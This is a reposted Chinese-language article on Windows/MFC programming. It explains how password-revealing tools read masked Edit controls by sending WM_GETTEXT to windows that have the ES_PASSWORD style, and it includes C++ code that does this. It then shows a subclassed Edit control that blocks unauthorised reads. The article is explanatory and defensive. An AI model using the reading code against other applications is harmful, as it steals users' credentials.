非法探取密碼的原理及其防範 (轉)

非法探取密碼的原理及其防範 (轉)[@more@]一、獲取Pass的原理： Edit是的一個標準控制元件，當把其Password屬性設為True時,就會將輸入的內容遮蔽為星號，從而達到保護的目的。雖然我們看來都是星號，但中的Edit控制元件實際仍是輸入的密碼，應用程式可以獲取該控制元件中的密碼，其他應用程式也可以透過向其傳送WM_GETTEXT或EM_GETLINE訊息來獲取Edit控制元件中的內容。程式正是利用Edit控制元件的這個特性，當發現當前探測的視窗是Edit控制元件並且具有ES_PASSWORD屬性時，則透過SendMessage向此視窗傳送WM_GETTEXT或EM_GETLINE訊息，這樣Edit框中的內容就一目瞭然了。 二、駭客工作方法： 首先要取得當前的視窗，並判斷是否是Edit控制元件，一般多透過滑鼠來指定要探測的視窗，例如在WM_MOUSEMOVE訊息的響應中進行判斷，現列舉程式碼片段如下： //將客戶座標轉換成螢幕座標 ClientToScreen(&point); //返回一個包含指定螢幕座標點的視窗 CWnd* pWnd = CWnd::WindowFromPoint(point); if (pWnd) { //獲取視窗控制程式碼 HWND hwndCurr = pWnd->GetSafeHwnd(); if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) != (::GetWindowThreadProcessId (hwndCurr, NULL))) { char lpClassName[255]; //獲取類名 if (::GetClassName(hwndCurr, lpClassName, 255)) { //判斷是否是Edit控制元件 if (0 == m_strWndClass.CompareNoCase("EDIT")) { //獲取視窗風格 LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE); //如果設定了ES_PASSWORD屬性 if (lStyle & ES_PASSWORD) { char szText[255]; //透過掌握的控制程式碼hwndCurr向此控制元件傳送WM_GETTEXT訊息 ::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText); //密碼已儲存在szText中 m_strPassword = szText; } } } } } 上述程式碼中值得注意的有以下幾個關鍵地方： ClientToScreen(&point); CWnd* pWnd = CWnd::WindowFromPoint(point); HWND hwndCurr = pWnd->GetSafeHwnd(); 這三句程式碼可以獲取當前滑鼠位置所在視窗的視窗控制程式碼，在SendMessage中要用到的。 ::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText); 這便是真正起作用的SendMessage了，其第一個引數指定了要接收訊息的視窗控制程式碼，我們已經透過上面的程式碼獲取到了，第二個引數就是讓Edit控制元件返回字元的WM_GETTEXT訊息了，並將得到的內容儲存在szText中。 三、防範措施 既然我們搞清除了駭客軟體普遍採取的手法，那我們自然能制訂出一套防範其的措施來。下面我們就要對Password進行保護。 從以上分析我們可以看出：Edit控制元件的主要在於沒有對傳送WM_GETTEXT或EM_GETLINE訊息者的身份進行檢查，只要能找到Edit視窗控制程式碼，任何程式都可獲取其內容。所以必須要對傳送訊息者的身份進行驗證，這裡給出一種方法來驗證傳送訊息者的身份是否合法： 1.建立新CEdit類 從CEdit繼承一個子類CPasswordEdit,申明全域性變數g_bSenderntity表明訊息傳送者的身份: BOOL g_bSenderIdentity; 然後響應CWnd的虛擬函式DefWindowProc,在這個回撥函式中進行身份驗證: LRESULTCPasswordEdit::DefWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam) { //對Edit的內容獲取必須透過以下兩個訊息之一 if((message==WM_GETTEXT) ||(message==EM_GETLINE)) { //檢查是否為合法 if(!g_bSenderIdentity) { //非法獲取,顯示資訊 AfxMessageBox(_T ("報告：正在試圖竊取密碼！")); return 0; } //合法獲取 g_bSenderIdentity=FALSE; } return CEdit::DefWindowProc (message,wParam,lParam); } 2.在資料輸入對話方塊中做些處理 在對話方塊中申明一個類成員m_edtPassword: CpasswordEdit m_edtPassword; 然後在對話方塊的OnInitDialog()中加入下列程式碼: m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this); 將控制與新類做關聯。 之後要在對話方塊的資料函式中將身份設為合法: void CDlgInput::DoData (CDataExchange＊pDX) { //如果獲取資料 //注意：對於CPropertyPage類這裡不需要 if (pDX－>m_bSaveAndValidate)條件 if(pDX－>m_bSaveAndValidate) { g_bSenderIdentity=TRUE; } CDialog::DoDataExchange(pDX); //{{AFX_DATA_MAP(CDlgInput) DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword); //}}AFX_DATA_MAP } 這樣，Password輸入框就擁有了合法身份，會受到保護。 結論： 以上的方法僅針對VC程式，對於其他語言如VB、等語言，需要藉助VC做一個Password的控制元件，實現方法與上述方法基本類似。以上程式均用VisualC＋＋6.0編制透過。